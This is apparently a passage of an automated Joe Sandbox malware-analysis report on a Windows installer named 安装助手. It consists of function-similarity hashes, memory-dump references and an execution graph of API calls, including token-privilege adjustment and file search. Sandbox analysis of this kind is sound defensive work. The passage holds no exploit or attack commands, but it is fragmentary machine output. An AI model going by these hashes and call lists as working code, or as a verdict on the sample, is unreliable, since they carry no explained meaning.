                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID: 3333
                                        • API String ID: 3732870572-2924271548
                                        • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                        • Instruction ID: d55b1a6c7c20f412696b5282fa50697561d673db0c99fce18c38fbe01f17d38f
                                        • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                        • Instruction Fuzzy Hash: AF2183F0D00704AFD7308FA98884B9BBAFDEB48755F50891EA186D7B50E770A9048B76
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID: d5l$h5l
                                        • API String ID: 269201875-1527648318
                                        • Opcode ID: 3b43ae732755b53038ada0d8b755a522528e1c4428892ac9a81cd2d3d3dd553a
                                        • Instruction ID: 25e0edc958a98696de21f0899b6d0a1b66e07b2bc7f050bf7cf70bf979aa0d9e
                                        • Opcode Fuzzy Hash: 3b43ae732755b53038ada0d8b755a522528e1c4428892ac9a81cd2d3d3dd553a
                                        • Instruction Fuzzy Hash: 2F11847124C701EBD310CF2AE441B86B7F4EB05398B31441DE5D987EB0D771E58587A4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$LuJ
                                        • API String ID: 3519838083-205571748
                                        • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                        • Instruction ID: 592c6765f3e6afc937547a018a2cdadb6c0de30e620584fb7db11790c094b173
                                        • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                        • Instruction Fuzzy Hash: BC016D72E41609DBDB10DFAA88805AEF7B4FF59304F40842FE56AE7E60C3345904CBA9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$xMJ
                                        • API String ID: 3519838083-951924499
                                        • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                        • Instruction ID: 120657ea38f8456781126c9746f919a30e6d18d1abafe91459c192d64f93dad5
                                        • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                        • Instruction Fuzzy Hash: 2A113971E01209DBCB00CFA9C4905AEB7B4FF59308B50C86EE569E7A60D3349A05CBA5
                                        APIs
                                        • _free.LIBCMT ref: 6CD1CB69
                                        • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CD1945A,?,00000004,?,4B42FCB6,?,?,6CD0E5AC,4B42FCB6,?), ref: 6CD1CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AllocHeap_free
                                        • String ID: 8Q
                                        • API String ID: 1080816511-4022487301
                                        • Opcode ID: 8519b151c444fbfa0db9fe0c8e4e742b9975137a1bf4175101043193deabb94c
                                        • Instruction ID: 8b9227e31cd5a727c6b147246dd5160a565904864f7fdaeade24defde1aacc07
                                        • Opcode Fuzzy Hash: 8519b151c444fbfa0db9fe0c8e4e742b9975137a1bf4175101043193deabb94c
                                        • Instruction Fuzzy Hash: ACF0AF3574E211A6DB212B3ABD00EAA36698FC2A78B144139E858D6EB0DB20C60181B4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prologctype
                                        • String ID: |zJ
                                        • API String ID: 3037903784-3782439380
                                        • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                        • Instruction ID: 9cf900e2171ca21861857060131ee06fb47e3112ef3aea113a4bb0a83a5c1225
                                        • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                        • Instruction Fuzzy Hash: 84E06532A05520EBE7248B49D81079EF3B4FF55B18F11425F941BA7A61CBB1E81487A5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prologctype
                                        • String ID: <oJ
                                        • API String ID: 3037903784-2791053824
                                        • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                        • Instruction ID: 79394c14014fce0d0001b6855d7cdbfb48b3570ec1980acb11c3ddf4db03bf43
                                        • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                        • Instruction Fuzzy Hash: 4EE06D72A05520EFDB14AF49D810BDEF7A4EF56714F12015FA015A7F61CBB5A800C795
                                        APIs
                                        • AcquireSRWLockExclusive.KERNEL32(6CE0266C,?,?,652EF5AA,6CBD22D8,6CE0230C), ref: 6CD058D9
                                        • ReleaseSRWLockExclusive.KERNEL32(6CE0266C), ref: 6CD05913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExclusiveLock$AcquireRelease
                                        • String ID: l&l
                                        • API String ID: 17069307-3573850595
                                        • Opcode ID: 85a7fb749fad4c093483129f5005ca5bfd220374ca68d171e25275b961bbf1b8
                                        • Instruction ID: 7fe1925cf61f7317c0791ea8c51b668242d4b8cc9dc304093e8655332f36a2a9
                                        • Opcode Fuzzy Hash: 85a7fb749fad4c093483129f5005ca5bfd220374ca68d171e25275b961bbf1b8
                                        • Instruction Fuzzy Hash: C8F0A738700501DBCB106F1DE448A65BBBCFB47339F14022EDD9543AA1D7301852CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @ K$DJ$T)K$X/K
                                        • API String ID: 0-3815299647
                                        • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                        • Instruction ID: 82863932820208b1d5231727c4d893647751b47656fef34a4301694852a1f658
                                        • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                        • Instruction Fuzzy Hash: E691F678604705DBDF10EF64C9507EEB3B2AF4230CF204419C86A5BBB5DB75A909C761
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D)K$H)K$P)K$T)K
                                        • API String ID: 0-2262112463
                                        • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                        • Instruction ID: f0dddc521adbf0083fde3785660332d2689254fcd9a9e86d8d4ae3ea802c6d78
                                        • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                        • Instruction Fuzzy Hash: 2451F039A04619EBCF00CF95CD44ADFB7B1AF0631CF10502AE85A67AB1DB71A94CCB64

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0.4%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:61
                                        execution_graph 73096 626ba3 VirtualFree 73097 5ab5d9 73098 5ab5f7 73097->73098 73099 5ab5e6 73097->73099 73099->73098 73103 5ab5fe 73099->73103 73104 5ab608 __EH_prolog 73103->73104 73110 626a40 VirtualFree 73104->73110 73106 5ab63d 73111 5a764c 73106->73111 73109 5a1e40 free 73109->73098 73110->73106 73112 5a7656 CloseHandle 73111->73112 73113 5a7661 73111->73113 73112->73113 73113->73109 73114 637da0 WaitForSingleObject 73115 637dc1 73114->73115 73116 637dbb GetLastError 73114->73116 73117 637dce CloseHandle 73115->73117 73119 637ddf 73115->73119 73116->73115 73118 637dd9 GetLastError 73117->73118 73117->73119 73118->73119 73120 5b1ade 73121 5b1ae8 __EH_prolog 73120->73121 73171 5a13f5 73121->73171 73124 5b1b32 6 API calls 73126 5b1b8d 73124->73126 73135 5b1bf8 73126->73135 73189 5b1ea4 9 API calls 73126->73189 73127 5b1b24 _CxxThrowException 73127->73124 73129 5b1bdf 73190 5a27bb 73129->73190 73133 5b1c89 73185 5b1eb9 73133->73185 73135->73133 73197 5c1d73 5 API calls __EH_prolog 73135->73197 73139 5b1cb2 _CxxThrowException 73139->73133 73172 5a13ff __EH_prolog 73171->73172 73198 5c7ebb 73172->73198 73175 5a1438 73202 5a1e0c 73175->73202 73178 5a14f4 73178->73124 73188 5c1d73 5 API calls __EH_prolog 73178->73188 73181 5a144d 73181->73178 73183 5a1507 73181->73183 73208 5a1265 5 API calls 2 library calls 73181->73208 73209 5e04d2 73181->73209 73215 5a1524 malloc _CxxThrowException __EH_prolog ctype 73181->73215 73216 5a2fec 73183->73216 73224 5a9313 GetCurrentProcess OpenProcessToken 73185->73224 73188->73127 73189->73129 73191 5a27c7 73190->73191 73195 5a27e3 73190->73195 73192 5a1e0c ctype 2 API calls 73191->73192 73191->73195 73193 5a27da 73192->73193 73231 5a1e40 free 73193->73231 73196 5a1e40 free 73195->73196 73196->73135 73197->73139 73200 5a142b 73198->73200 73201 5c7ec6 73198->73201 73199 5a1e40 free ctype 73199->73201 73200->73175 73207 5a1212 free ctype 73200->73207 73201->73199 73201->73200 73203 5a1e1c malloc 73202->73203 73204 5a1e15 73202->73204 73205 5a1e2a _CxxThrowException 73203->73205 73206 5a1e3e 73203->73206 73204->73203 73205->73206 73206->73181 73207->73175 73208->73181 73210 5e04df 73209->73210 73211 5e0513 73209->73211 73212 5e04fd 73210->73212 73213 5e04e8 _CxxThrowException 73210->73213 73211->73181 73222 5e0551 malloc _CxxThrowException free memcpy ctype 73212->73222 73213->73212 73215->73181 73217 5a2ffc 73216->73217 73221 5a2ff8 73216->73221 73218 5a1e0c ctype 2 API calls 73217->73218 73217->73221 73219 5a3010 73218->73219 73223 5a1e40 free 73219->73223 73221->73178 73222->73211 73223->73221 73225 5a933a LookupPrivilegeValueW 73224->73225 73226 5a9390 73224->73226 73227 5a934c AdjustTokenPrivileges 73225->73227 73228 5a9382 73225->73228 73227->73228 73229 5a9372 GetLastError 73227->73229 73230 5a9385 CloseHandle 73228->73230 73229->73230 73230->73226 73231->73195 73232 5a42d1 73233 5a42bd 73232->73233 73234 5a42c5 73233->73234 73235 5a1e0c ctype 2 API calls 73233->73235 73235->73234 73236 5dacd3 73237 5dace0 73236->73237 73241 5dacf1 73236->73241 73237->73241 73242 5dacf8 73237->73242 73243 5dc0b3 __EH_prolog 73242->73243 73247 5dc0ed 73243->73247 73250 5c7193 73243->73250 73258 5a1e40 free 73243->73258 73245 5daceb 73249 5a1e40 free 73245->73249 73259 5a1e40 free 73247->73259 73249->73241 73251 5c719d __EH_prolog 73250->73251 73260 5d2db9 free ctype 73251->73260 73253 5c71b3 73261 5c71d5 free __EH_prolog ctype 73253->73261 73255 5c71bf 73262 5a1e40 free 73255->73262 73257 5c71c7 73257->73243 73258->73243 73259->73245 73260->73253 73261->73255 73262->73257 73266 6269f0 free 73267 63ffb1 __setusermatherr 73268 63ffbd 73267->73268 73272 640068 _controlfp 73268->73272 73270 63ffc2 _initterm __getmainargs _initterm __p___initenv 73271 5dc27c 73270->73271 73272->73270 73273 5cd948 73303 5cdac7 73273->73303 73275 5cd94f 73311 5a2e04 73275->73311 73278 5a2e04 2 API calls 73279 5cd987 73278->73279 73282 5cd9e7 73279->73282 73314 5a6404 73279->73314 73284 5cda0f 73282->73284 73285 5cda36 73282->73285 73339 5a1e40 free 73284->73339 73289 5cda94 73285->73289 73299 5e04d2 5 API calls 73285->73299 73341 5a2da9 73285->73341 73344 5a1524 malloc _CxxThrowException __EH_prolog ctype 73285->73344 73345 5a1e40 free 73285->73345 73288 5cd9bf 73337 5a1e40 free 73288->73337 73346 5a1e40 free 73289->73346 73290 5cda17 73340 5a1e40 free 73290->73340 73295 5cd9c7 73338 5a1e40 free 73295->73338 73296 5cda9c 73347 5a1e40 free 73296->73347 73299->73285 73300 5cd9cf 73304 5cdad1 __EH_prolog 73303->73304 73305 5a2e04 2 API calls 73304->73305 73306 5cdb33 73305->73306 73307 5a2e04 2 API calls 73306->73307 73308 5cdb3f 73307->73308 73309 5a2e04 2 API calls 73308->73309 73310 5cdb55 73309->73310 73310->73275 73312 5a1e0c ctype 2 API calls 73311->73312 73313 5a2e11 73312->73313 73313->73278 73348 5a631f 73314->73348 73317 5a6423 73352 5a2f88 73317->73352 73318 5a2f88 3 API calls 73318->73317 73321 5b7e5a 73322 5b7e64 __EH_prolog 73321->73322 73418 5b8179 73322->73418 73325 5c7ebb free 73326 5b7e7f 73325->73326 73327 5a2fec 3 API calls 73326->73327 73328 5b7e9a 73327->73328 73329 5a2da9 2 API calls 73328->73329 73330 5b7ea7 73329->73330 73423 5a6c72 73330->73423 73334 5b7ecb 73335 5b7ed8 73334->73335 73525 5a757d GetLastError 73334->73525 73335->73282 73335->73288 73337->73295 73338->73300 73339->73290 73340->73300 73697 5a2d4d 73341->73697 73343 5a2dc6 73343->73285 73344->73285 73345->73285 73346->73296 73347->73300 73349 5a9245 73348->73349 73358 5a90da 73349->73358 73353 5a2f9a 73352->73353 73354 5a2fbe 73353->73354 73355 5a1e0c ctype 2 API calls 73353->73355 73354->73321 73356 5a2fb4 73355->73356 73417 5a1e40 free 73356->73417 73359 5a90e4 __EH_prolog 73358->73359 73360 5a2f88 3 API calls 73359->73360 73362 5a90f7 73360->73362 73361 5a915d 73363 5a2e04 2 API calls 73361->73363 73362->73361 73364 5a9109 73362->73364 73365 5a9165 73363->73365 73368 5a6414 73364->73368 73399 5a2e47 73364->73399 73366 5a91be 73365->73366 73369 5a9174 73365->73369 73408 5a6332 6 API calls 2 library calls 73366->73408 73368->73317 73368->73318 73372 5a2f88 3 API calls 73369->73372 73370 5a917d 73373 5a91ca 73370->73373 73406 5a859e malloc _CxxThrowException free _CxxThrowException 73370->73406 73372->73370 73413 5a1e40 free 73373->73413 73377 5a912e 73380 5a914d 73377->73380 73404 5a31e5 malloc _CxxThrowException free _CxxThrowException 73377->73404 73379 5a9185 73383 5a2e04 2 API calls 73379->73383 73405 5a1e40 free 73380->73405 73384 5a9197 73383->73384 73385 5a91ce 73384->73385 73386 5a919f 73384->73386 73388 5a2f88 3 API calls 73385->73388 73387 5a91b9 73386->73387 73407 5a1089 malloc _CxxThrowException free _CxxThrowException 73386->73407 73409 5a3199 malloc _CxxThrowException free _CxxThrowException 73387->73409 73388->73387 73391 5a91e6 73410 5a8f57 memmove 73391->73410 73393 5a91ee 73394 5a91f2 73393->73394 73395 5a2fec 3 API calls 73393->73395 73412 5a1e40 free 73394->73412 73397 5a9212 73395->73397 73411 5a31e5 malloc _CxxThrowException free _CxxThrowException 73397->73411 73400 5a2e57 73399->73400 73414 5a2ba6 73400->73414 73403 5a8f57 memmove 73403->73377 73404->73380 73405->73368 73406->73379 73407->73387 73408->73370 73409->73391 73410->73393 73411->73394 73412->73373 73413->73368 73415 5a1e0c ctype 2 API calls 73414->73415 73416 5a2bbb 73415->73416 73416->73403 73417->73354 73420 5b8906 73418->73420 73419 5b7e77 73419->73325 73420->73419 73526 5b8804 free ctype 73420->73526 73527 5a1e40 free 73420->73527 73425 5a6c7c __EH_prolog 73423->73425 73424 5a6cd3 73427 5a6ce2 73424->73427 73431 5a6d87 73424->73431 73425->73424 73426 5a6cb7 73425->73426 73428 5a2f88 3 API calls 73426->73428 73430 5a2f88 3 API calls 73427->73430 73429 5a6cc7 73428->73429 73524 5a1e40 free 73429->73524 73436 5a6cf5 73430->73436 73432 5a2e47 2 API calls 73431->73432 73438 5a6f4a 73431->73438 73433 5a6db0 73432->73433 73434 5a2e47 2 API calls 73433->73434 73446 5a6dc0 73434->73446 73435 5a6d4a 73545 5a7b41 28 API calls 73435->73545 73436->73435 73439 5a6d0b 73436->73439 73441 5a6fd1 73438->73441 73443 5a6f7e 73438->73443 73544 5a9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73439->73544 73440 5a6d5f 73453 5a764c CloseHandle 73440->73453 73448 5a70e5 73441->73448 73449 5a701d 73441->73449 73450 5a6fed 73441->73450 73563 5a6bf5 11 API calls 2 library calls 73443->73563 73444 5a6d36 73444->73435 73445 5a6d3a 73444->73445 73445->73429 73458 5a6dfe 73446->73458 73546 5a3221 malloc _CxxThrowException free _CxxThrowException 73446->73546 73528 5a6868 73448->73528 73449->73448 73566 5a717b 13 API calls 73449->73566 73565 5a6bf5 11 API calls 2 library calls 73450->73565 73453->73429 73455 5a6f85 73455->73448 73460 5a6f99 73455->73460 73456 5a6fca 73464 5a6848 FindClose 73456->73464 73461 5a6e43 73458->73461 73471 5a6e1e 73458->73471 73459 5a6ff2 73459->73448 73462 5a7006 73459->73462 73465 5a2f88 3 API calls 73460->73465 73463 5a6c72 42 API calls 73461->73463 73462->73456 73467 5a6e4e 73463->73467 73464->73429 73468 5a6fb0 73465->73468 73469 5a6f3a 73467->73469 73470 5a6e41 73467->73470 73564 5a717b 13 API calls 73468->73564 73561 5a1e40 free 73469->73561 73547 5a2f1c 73470->73547 73471->73470 73475 5a2fec 3 API calls 73471->73475 73474 5a6f42 73562 5a1e40 free 73474->73562 73475->73470 73477 5a7052 73480 5a7056 73477->73480 73481 5a7064 73477->73481 73484 5a2f88 3 API calls 73480->73484 73483 5a2e47 2 API calls 73481->73483 73486 5a706d 73483->73486 73487 5a705f 73484->73487 73485 5a2e04 2 API calls 73510 5a6e83 73485->73510 73567 5a1089 malloc _CxxThrowException free _CxxThrowException 73486->73567 73491 5a6848 FindClose 73487->73491 73490 5a707b 73568 5a1089 malloc _CxxThrowException free _CxxThrowException 73490->73568 73491->73429 73492 5a6ecf 73554 5a1e40 free 73492->73554 73494 5a6ec7 SetLastError 73494->73492 73495 5a7085 73498 5a6868 12 API calls 73495->73498 73500 5a7095 73498->73500 73499 5a6f11 73555 5a1e40 free 73499->73555 73503 5a7099 wcscmp 73500->73503 73504 5a70bb 73500->73504 73501 5a6ed3 73553 5a31e5 malloc _CxxThrowException free _CxxThrowException 73501->73553 73503->73504 73507 5a70b1 73503->73507 73569 5a6bf5 11 API calls 2 library calls 73504->73569 73506 5a6f19 73556 5a6848 73506->73556 73513 5a2f88 3 API calls 73507->73513 73510->73492 73510->73494 73510->73501 73514 5a2e04 2 API calls 73510->73514 73550 5a6bb5 17 API calls 73510->73550 73551 5a22bf CharUpperW 73510->73551 73552 5a1e40 free 73510->73552 73512 5a70c6 73518 5a70d8 73512->73518 73522 5a7129 73512->73522 73516 5a714c 73513->73516 73514->73510 73572 5a1e40 free 73516->73572 73570 5a1e40 free 73518->73570 73521 5a6f2b 73560 5a1e40 free 73521->73560 73522->73507 73524->73334 73525->73335 73526->73420 73527->73420 73529 5a6872 __EH_prolog 73528->73529 73530 5a6848 FindClose 73529->73530 73532 5a6880 73530->73532 73531 5a68f6 73531->73456 73571 5a717b 13 API calls 73531->73571 73532->73531 73533 5a689b FindFirstFileW 73532->73533 73534 5a68a9 73532->73534 73533->73534 73535 5a68ee 73534->73535 73537 5a2e04 2 API calls 73534->73537 73535->73531 73579 5a6919 malloc _CxxThrowException free 73535->73579 73538 5a68ba 73537->73538 73573 5a8b4a 73538->73573 73540 5a68d0 73541 5a68e2 73540->73541 73542 5a68d4 FindFirstFileW 73540->73542 73578 5a1e40 free 73541->73578 73542->73541 73544->73444 73545->73440 73546->73458 73548 5a2ba6 2 API calls 73547->73548 73549 5a2f2c 73548->73549 73549->73485 73550->73510 73551->73510 73552->73510 73553->73492 73554->73499 73555->73506 73557 5a6852 FindClose 73556->73557 73558 5a685d 73556->73558 73557->73558 73559 5a1e40 free 73558->73559 73559->73521 73560->73429 73561->73474 73562->73438 73563->73455 73564->73456 73565->73459 73566->73477 73567->73490 73568->73495 73569->73512 73570->73459 73571->73456 73572->73487 73580 5a8b80 73573->73580 73575 5a8b6e 73575->73540 73577 5a2f88 3 API calls 73577->73575 73578->73535 73579->73531 73581 5a8b8a __EH_prolog 73580->73581 73582 5a8b55 73581->73582 73583 5a8c7b 73581->73583 73589 5a8be1 73581->73589 73582->73575 73582->73577 73584 5a8d23 73583->73584 73586 5a8c8f 73583->73586 73585 5a8e8a 73584->73585 73588 5a8d3b 73584->73588 73587 5a2e47 2 API calls 73585->73587 73586->73588 73594 5a8c9e 73586->73594 73590 5a8e96 73587->73590 73591 5a2e04 2 API calls 73588->73591 73589->73582 73592 5a2e47 2 API calls 73589->73592 73598 5a2e47 2 API calls 73590->73598 73593 5a8d43 73591->73593 73595 5a8c05 73592->73595 73677 5a6332 6 API calls 2 library calls 73593->73677 73597 5a2e47 2 API calls 73594->73597 73601 5a8c17 73595->73601 73602 5a8c24 73595->73602 73605 5a8ca7 73597->73605 73600 5a8eb8 73598->73600 73599 5a8d52 73630 5a8d56 73599->73630 73678 5a859e malloc _CxxThrowException free _CxxThrowException 73599->73678 73689 5a8f57 memmove 73600->73689 73667 5a1e40 free 73601->73667 73608 5a2e47 2 API calls 73602->73608 73610 5a2e47 2 API calls 73605->73610 73607 5a8ec4 73613 5a8c35 73608->73613 73614 5a8cd0 73610->73614 73668 5a8f57 memmove 73613->73668 73672 5a8f57 memmove 73614->73672 73621 5a8c41 73624 5a8c6b 73621->73624 73669 5a31e5 malloc _CxxThrowException free _CxxThrowException 73621->73669 73622 5a8cdc 73688 5a1e40 free 73630->73688 73636 5a8d65 73636->73630 73667->73582 73668->73621 73672->73622 73677->73599 73678->73636 73688->73582 73689->73607 73698 5a2ba6 2 API calls 73697->73698 73699 5a2d68 73698->73699 73699->73343 73699->73699 73700 5ca7c5 73708 5ca96b 73700->73708 73720 5ca7e9 73700->73720 73701 5cade3 73805 5a1e40 free 73701->73805 73703 5ca952 73703->73708 73786 5ce0b0 6 API calls 73703->73786 73704 5cadeb 73806 5a1e40 free 73704->73806 73708->73701 73709 5cac1e 73708->73709 73735 5cac6c 73708->73735 73747 5cad88 73708->73747 73751 5cad17 73708->73751 73753 5cacbc 73708->73753 73767 5b101c 73708->73767 73770 5c98f2 73708->73770 73776 5ccc6f 73708->73776 73787 5c9531 5 API calls __EH_prolog 73708->73787 73788 5c80c1 malloc _CxxThrowException __EH_prolog 73708->73788 73789 5cc820 5 API calls 2 library calls 73708->73789 73790 5c814d 6 API calls 73708->73790 73791 5c8125 free ctype 73708->73791 73792 5a1e40 free 73709->73792 73710 5cae99 73711 5a1e0c ctype 2 API calls 73710->73711 73715 5caea9 memset memset 73711->73715 73714 5e04d2 malloc _CxxThrowException free _CxxThrowException memcpy 73717 5cadf3 73714->73717 73718 5caedd 73715->73718 73716 5cac26 73793 5a1e40 free 73716->73793 73717->73710 73717->73714 73807 5a1e40 free 73718->73807 73720->73703 73726 5e04d2 5 API calls 73720->73726 73785 5ce0b0 6 API calls 73720->73785 73723 5caee5 73808 5a1e40 free 73723->73808 73726->73720 73727 5caef0 73809 5a1e40 free 73727->73809 73731 5cc430 73811 5a1e40 free 73731->73811 73733 5cc438 73812 5a1e40 free 73733->73812 73734 5cac2e 73810 5a1e40 free 73734->73810 73794 5a1e40 free 73735->73794 73739 5cc443 73813 5a1e40 free 73739->73813 73740 5cac85 73795 5a1e40 free 73740->73795 73743 5cc44e 73814 5a1e40 free 73743->73814 73745 5cc459 73802 5c8125 free ctype 73747->73802 73799 5c8125 free ctype 73751->73799 73752 5cad93 73803 5a1e40 free 73752->73803 73796 5c8125 free ctype 73753->73796 73757 5cacc7 73797 5a1e40 free 73757->73797 73758 5cad3c 73800 5a1e40 free 73758->73800 73759 5cadac 73804 5a1e40 free 73759->73804 73763 5cace0 73798 5a1e40 free 73763->73798 73764 5cad55 73801 5a1e40 free 73764->73801 73815 5ab95a 